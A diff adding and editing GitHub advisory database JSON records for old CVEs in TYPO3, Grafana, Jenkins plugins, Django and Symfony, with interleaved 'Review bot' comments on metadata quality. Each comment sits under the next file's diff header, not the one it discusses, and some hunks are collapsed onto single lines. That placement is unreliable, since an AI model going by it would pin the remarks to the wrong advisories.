+ "name": "org.jvnet.hudson.plugins:analysis-core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.92"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.91"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000102"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2017-08-07/"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.securityfocus.com/bid/101061"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T22:35:50Z",
+ "nvd_published_at": "2017-10-05T01:29:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-9hh2-8cw6-hfv7/GHSA-9hh2-8cw6-hfv7.json b/advisories/github-reviewed/2022/05/GHSA-9hh2-8cw6-hfv7/GHSA-9hh2-8cw6-hfv7.json
new file mode 100644
index 0000000000000..b841fa46b0e08
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-9hh2-8cw6-hfv7/GHSA-9hh2-8cw6-hfv7.json
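Review bot: `details` describes the issue as affecting "some Static Analysis Utilities based plugins" and names the Warnings Plugin as an example, but the only `affected` package is `org.jvnet.hudson.plugins:analysis-core`, so a reader cannot tell whether the dependent plugins need their own updates or inherit the fix from analysis-core 1.92. If the fix lives entirely in analysis-core, which the single `fixed` event suggests, one sentence in `details` stating that plugins built on it are fixed by updating analysis-core to 1.92 would remove the ambiguity; if not, the other plugins belong in `affected`.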
@@ -0,0 +1,136 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9hh2-8cw6-hfv7", + "modified": "2024-02-07T23:35:28Z", + "published": "2022-05-17T01:55:58Z", + "aliases": [ + "CVE-2010-5100" + ], + "summary": "TYPO3 Cross-Site Scripting vulnerability in the Install Tool ", + "details": "Multiple cross-site scripting (XSS) vulnerabilities in the Install Tool in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.16" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5100" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/9bb2fe60d8938048c9049e2d660c0ae8409b21d4" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/cf974942d1738b6b38c506a30a808c5e405d3ca2" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/e892f0a17f40d703fd71ee66490dee15b132909c" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64181" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/install" + }, + { + "type": "WEB", + "url": "http://secunia.com/advisories/35770" + }, + { + "type": "WEB", + "url": 
"http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-022/" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2011/01/13/2" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/10/7" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/11/3" + }, + { + "type": "WEB", + "url": "http://www.osvdb.org/70120" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/45470" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T23:35:28Z", + "nvd_published_at": "2012-05-21T20:55:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-9hv8-4frf-cprf/GHSA-9hv8-4frf-cprf.json b/advisories/github-reviewed/2022/05/GHSA-9hv8-4frf-cprf/GHSA-9hv8-4frf-cprf.json new file mode 100644 index 0000000000000..fe9642fd6aae3 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-9hv8-4frf-cprf/GHSA-9hv8-4frf-cprf.json 
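Review bot: The `summary` string carries a trailing space, `"TYPO3 Cross-Site Scripting vulnerability in the Install Tool "`. It is harmless to parsers but shows up in any UI or diff that renders the title, and the same trailing space appears in the summaries of the GHSA-9jrh and GHSA-c3r5 files in this diff. Trim to `"summary": "TYPO3 Cross-Site Scripting vulnerability in the Install Tool",` and likewise for the other two.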
@@ -0,0 +1,69 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9hv8-4frf-cprf",
+ "modified": "2024-02-01T21:47:17Z",
+ "published": "2022-05-24T17:18:56Z",
+ "aliases": [
+ "CVE-2018-18624"
+ ],
+ "summary": "Grafana XSS via a column style",
+ "details": "Grafana has a XSS vulnerability via a column style on the \"Dashboard > Table Panel\" screen. NOTE: this issue exists because of an incomplete fix for CVE-2018-12099.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/grafana/grafana"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "7.0.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-18624"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/grafana/grafana/pull/11813"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/grafana/grafana/pull/23816"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/grafana/grafana/commit/0284747c88eb9435899006d26ffaf65f89dec88e"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.netapp.com/advisory/ntap-20200608-0008/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-01T21:47:17Z",
+ "nvd_published_at": "2020-06-02T17:15:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-9hw3-4gvp-8mv5/GHSA-9hw3-4gvp-8mv5.json b/advisories/github-reviewed/2022/05/GHSA-9hw3-4gvp-8mv5/GHSA-9hw3-4gvp-8mv5.json
new file mode 100644
index 0000000000000..052629b39e824
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-9hw3-4gvp-8mv5/GHSA-9hw3-4gvp-8mv5.json
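Review bot: `details` says the issue exists because of an incomplete fix for CVE-2018-12099, and the references list two pull requests (#11813 and #23816) plus one commit, but nothing states which of them is the complete fix that shipped in the `"fixed": "7.0.0"` release. If #11813 is the earlier incomplete fix and #23816 the one that landed in 7.0.0, a sentence such as `The fix was completed in Grafana 7.0.0 (PR #23816).` in `details` would let a reader on 6.x understand why the range extends to 7.0.0; that attribution should be confirmed against the references before it is added.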
@@ -0,0 +1,105 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9hw3-4gvp-8mv5", + "modified": "2024-02-07T23:48:05Z", + "published": "2022-05-17T01:55:59Z", + "aliases": [ + "CVE-2010-5097" + ], + "summary": "TYPO3 Cross-site scripting (XSS) vulnerability in the click enlarge functionality", + "details": "Cross-site scripting (XSS) vulnerability in the click enlarge functionality in TYPO3 4.3.x before 4.3.9 and 4.4.x before 4.4.5 when the caching framework is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5097" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64178" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/frontend" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20110201071734/http://secunia.com/advisories/35770" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20111223211753/http://www.securityfocus.com/bid/45470" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-022/" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2011/01/13/2" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/10/7" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/11/3" + }, + { + "type": "WEB", + "url": 
"http://www.openwall.com/lists/oss-security/2012/05/12/5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T23:48:05Z", + "nvd_published_at": "2012-05-21T20:55:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-9jrh-hch8-rr5c/GHSA-9jrh-hch8-rr5c.json b/advisories/github-reviewed/2022/05/GHSA-9jrh-hch8-rr5c/GHSA-9jrh-hch8-rr5c.json new file mode 100644 index 0000000000000..b817b2bb5dc08 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-9jrh-hch8-rr5c/GHSA-9jrh-hch8-rr5c.json 
@@ -0,0 +1,57 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9jrh-hch8-rr5c",
+ "modified": "2024-01-30T22:38:38Z",
+ "published": "2022-05-14T03:23:41Z",
+ "aliases": [
+ "CVE-2018-1000148"
+ ],
+ "summary": "Jenkins Copy To Slave Plugin allows access to arbitrary files on the Jenkins controller file system ",
+ "details": "An exposure of sensitive information vulnerability exists in Jenkins Copy To Slave Plugin version 1.4.4 and older in CopyToSlaveBuildWrapper.java that allows attackers with permission to configure jobs to read arbitrary files from the Jenkins master file system.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:copy-to-slave"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "1.4.4"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000148"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2018-03-26/#SECURITY-545"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T22:38:38Z",
+ "nvd_published_at": "2018-04-05T13:29:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-9r7f-rqhw-j8h8/GHSA-9r7f-rqhw-j8h8.json b/advisories/github-reviewed/2022/05/GHSA-9r7f-rqhw-j8h8/GHSA-9r7f-rqhw-j8h8.json
new file mode 100644
index 0000000000000..ab6dcf720adda
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-9r7f-rqhw-j8h8/GHSA-9r7f-rqhw-j8h8.json
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9r7f-rqhw-j8h8",
+ "modified": "2024-01-30T21:57:28Z",
+ "published": "2022-05-13T01:18:43Z",
+ "aliases": [
+ "CVE-2018-1000015"
+ ],
+ "summary": "Incorrect permission checks in Pipeline: Nodes and Processes plugin",
+ "details": "On Jenkins instances with Authorize Project plugin, the authentication associated with a build may lack the Computer/Build permission on some agents. This did not prevent the execution of Pipeline `node` blocks on those agents due to incorrect permissions checks in Pipeline: Nodes and Processes plugin 2.17 and earlier.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins.workflow:workflow-durable-task-step"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2.18"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 2.17"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000015"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2018-01-22/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T21:57:28Z",
+ "nvd_published_at": "2018-01-23T14:29:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-9rx5-w522-5fh7/GHSA-9rx5-w522-5fh7.json b/advisories/github-reviewed/2022/05/GHSA-9rx5-w522-5fh7/GHSA-9rx5-w522-5fh7.json
new file mode 100644
index 0000000000000..16bb33cd68b9c
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-9rx5-w522-5fh7/GHSA-9rx5-w522-5fh7.json
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9rx5-w522-5fh7",
+ "modified": "2024-01-30T22:43:31Z",
+ "published": "2022-05-13T01:48:32Z",
+ "aliases": [
+ "CVE-2018-1000114"
+ ],
+ "summary": "Jenkins Promoted Builds Plugin allowed unauthorized users to run some promotion processes",
+ "details": "An improper authorization vulnerability exists in Jenkins Promoted Builds Plugin 2.31.1 and earlier in Status.java and ManualCondition.java that allow an attacker with read access to jobs to perform promotions.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:promoted-builds"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "3.0"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 2.31.1"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000114"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2018-02-26/#SECURITY-746"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-863"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T22:43:31Z",
+ "nvd_published_at": "2018-03-13T13:29:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-9wr9-fw9v-8fgr/GHSA-9wr9-fw9v-8fgr.json b/advisories/github-reviewed/2022/05/GHSA-9wr9-fw9v-8fgr/GHSA-9wr9-fw9v-8fgr.json
index cdfcaa3e99eff..7eae0310285d9 100644
--- a/advisories/github-reviewed/2022/05/GHSA-9wr9-fw9v-8fgr/GHSA-9wr9-fw9v-8fgr.json
+++ b/advisories/github-reviewed/2022/05/GHSA-9wr9-fw9v-8fgr/GHSA-9wr9-fw9v-8fgr.json
@@ -78,10 +78,18 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8141"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8141.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/magento/magento2"
 },
+ {
+ "type": "WEB",
+ "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
+ },
 {
 "type": "WEB",
 "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
diff --git a/advisories/github-reviewed/2022/05/GHSA-9xg7-gg9m-rmq9/GHSA-9xg7-gg9m-rmq9.json b/advisories/github-reviewed/2022/05/GHSA-9xg7-gg9m-rmq9/GHSA-9xg7-gg9m-rmq9.json
new file mode 100644
index 0000000000000..7b73e832eb33d
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-9xg7-gg9m-rmq9/GHSA-9xg7-gg9m-rmq9.json
@@ -0,0 +1,109 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9xg7-gg9m-rmq9", + "modified": "2024-02-08T21:27:24Z", + "published": "2022-05-02T03:37:17Z", + "aliases": [ + "CVE-2009-2659" + ], + "summary": "Django Admin Media Handler Vulnerable to Directory Traversal", + "details": "The Admin media handler in `core/servers/basehttp.py` in Django 1.0 and 0.96 does not properly map URL requests to expected \"static media files,\" which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a crafted URL.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "Django" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.96.0" + }, + { + "fixed": "0.96.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "Django" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0" + }, + { + "fixed": "1.0.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-2659" + }, + { + "type": "WEB", + "url": "https://github.com/django/django/commit/da85d76fd6ca846f3b0ff414e042ddb5e62e2e69" + }, + { + "type": "WEB", + "url": "https://github.com/django/django/commit/df7f917b7f51ba969faa49d000ffc79572c5dcb4" + }, + { + "type": "PACKAGE", + "url": "https://github.com/django/django" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20111211001428/http://www.securityfocus.com/bid/35859" + }, + { + "type": "WEB", + "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00055.html" + }, + { + "type": "WEB", + "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00069.html" + }, + { + "type": "WEB", + "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=539134" + }, + { + "type": "WEB", + "url": "http://code.djangoproject.com/changeset/11353" + }, + { + "type": "WEB", + "url": 
"http://www.djangoproject.com/weblog/2009/jul/28/security/" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2009/07/29/2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T21:27:24Z", + "nvd_published_at": "2009-08-04T16:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-c2v7-j5gq-wcq4/GHSA-c2v7-j5gq-wcq4.json b/advisories/github-reviewed/2022/05/GHSA-c2v7-j5gq-wcq4/GHSA-c2v7-j5gq-wcq4.json index b273742922a4e..7bc53755625d8 100644 --- a/advisories/github-reviewed/2022/05/GHSA-c2v7-j5gq-wcq4/GHSA-c2v7-j5gq-wcq4.json +++ b/advisories/github-reviewed/2022/05/GHSA-c2v7-j5gq-wcq4/GHSA-c2v7-j5gq-wcq4.json @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "illuminate/auth" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.5.10" + } + ] + } + ] } ], "references": [ @@ -44,6 +63,14 @@ "type": "WEB", "url": "https://github.com/laravel/framework/pull/21320" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/illuminate/auth/CVE-2017-14775.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/laravel/framework/CVE-2017-14775.yaml" + }, { "type": "WEB", "url": "https://github.com/laravel/framework/releases/tag/v5.5.10" diff --git a/advisories/github-reviewed/2022/05/GHSA-c3r5-vxj6-62mc/GHSA-c3r5-vxj6-62mc.json b/advisories/github-reviewed/2022/05/GHSA-c3r5-vxj6-62mc/GHSA-c3r5-vxj6-62mc.json new file mode 100644 index 0000000000000..3428a1d4ee967 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-c3r5-vxj6-62mc/GHSA-c3r5-vxj6-62mc.json 
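Review bot: The two `Django` ranges write versions in different shapes: the 0.96 entry uses three components (`"introduced": "0.96.0"`, `"fixed": "0.96.4"`) while the 1.0 entry uses two (`"introduced": "1.0"`, `"fixed": "1.0.3"`). PEP 440 treats `1.0` and `1.0.0` as equal, so matching should be unaffected, but consistent `x.y.z` strings make the file easier to scan and diff; `"introduced": "1.0.0"` would align it with its sibling. It is also worth a glance at how PyPI actually names the 0.96 release, since `0.96.0` may not correspond to a published version string even if it compares equal.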
@@ -0,0 +1,61 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c3r5-vxj6-62mc",
+ "modified": "2024-01-30T21:23:30Z",
+ "published": "2022-05-24T16:52:46Z",
+ "aliases": [
+ "CVE-2019-10379"
+ ],
+ "summary": "Jenkins Google Cloud Messaging Notification Plugin stores credentials in plain text ",
+ "details": "Jenkins Google Cloud Messaging Notification Plugin 1.0 and earlier stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:gcm-notification"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "1.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10379"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-591"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-522"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T21:23:30Z",
+ "nvd_published_at": "2019-08-07T15:15:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-c3wf-rrhq-rfp2/GHSA-c3wf-rrhq-rfp2.json b/advisories/github-reviewed/2022/05/GHSA-c3wf-rrhq-rfp2/GHSA-c3wf-rrhq-rfp2.json
new file mode 100644
index 0000000000000..0ec888e5ec98b
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-c3wf-rrhq-rfp2/GHSA-c3wf-rrhq-rfp2.json
@@ -0,0 +1,61 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c3wf-rrhq-rfp2",
+ "modified": "2024-01-30T21:13:36Z",
+ "published": "2022-05-24T17:03:47Z",
+ "aliases": [
+ "CVE-2019-16560"
+ ],
+ "summary": "Cross-site request forgery vulnerability in Jenkins WebSphere Deployer Plugin",
+ "details": "A cross-site request forgery vulnerability in Jenkins WebSphere Deployer Plugin 1.6.1 and earlier allows attackers to perform connection tests and determine whether files with an attacker-specified path exist on the Jenkins master file system.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:websphere-deployer"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "1.6.1"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16560"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1371"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T21:13:36Z",
+ "nvd_published_at": "2019-12-17T15:15:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-c49r-8gj6-768r/GHSA-c49r-8gj6-768r.json b/advisories/github-reviewed/2022/05/GHSA-c49r-8gj6-768r/GHSA-c49r-8gj6-768r.json
index 38692d6241874..db993605bcc61 100644
--- a/advisories/github-reviewed/2022/05/GHSA-c49r-8gj6-768r/GHSA-c49r-8gj6-768r.json
+++ b/advisories/github-reviewed/2022/05/GHSA-c49r-8gj6-768r/GHSA-c49r-8gj6-768r.json
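Review bot: The CVSS vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`, which is what produces the HIGH rating in `database_specific.severity`, looks out of step with `details`, which describes a CSRF that lets an attacker trigger connection tests and learn whether a given path exists on the Jenkins master — an information-disclosure impact rather than high integrity and availability loss. If the vector was taken verbatim from NVD, keeping it is the usual practice for this database and the discrepancy only needs recording in the review; otherwise a vector that reflects the described impact would bring the rating in line with the text. Either way the `details` sentence is what the referenced Jenkins advisory supports, so it should not be reworded to fit the score.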
@@ -15,6 +15,82 @@ } ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/intl" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.38" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/intl" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.31" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/intl" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/intl" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.0" + }, + { + "fixed": "3.3.13" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -32,10 +108,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 2.7.37" - } + ] }, { "package": { @@ -54,10 +127,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 2.8.30" - } + ] }, { "package": { @@ -69,17 +139,14 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.2.0" + "introduced": "3.0.0" }, { "fixed": "3.2.14" } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 3.2.13" - } + ] }, { "package": { @@ -98,10 +165,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 3.3.12" - } + ] } ], "references": [ @@ -113,6 +177,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/pull/24994" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/intl/CVE-2017-16654.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2017-16654.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" 
@@ -125,6 +197,10 @@
 "type": "WEB",
 "url": "https://symfony.com/blog/cve-2017-16654-intl-bundle-readers-breaking-out-of-paths"
 },
+ {
+ "type": "WEB",
+ "url": "https://symfony.com/cve-2017-16654"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2018/dsa-4262"
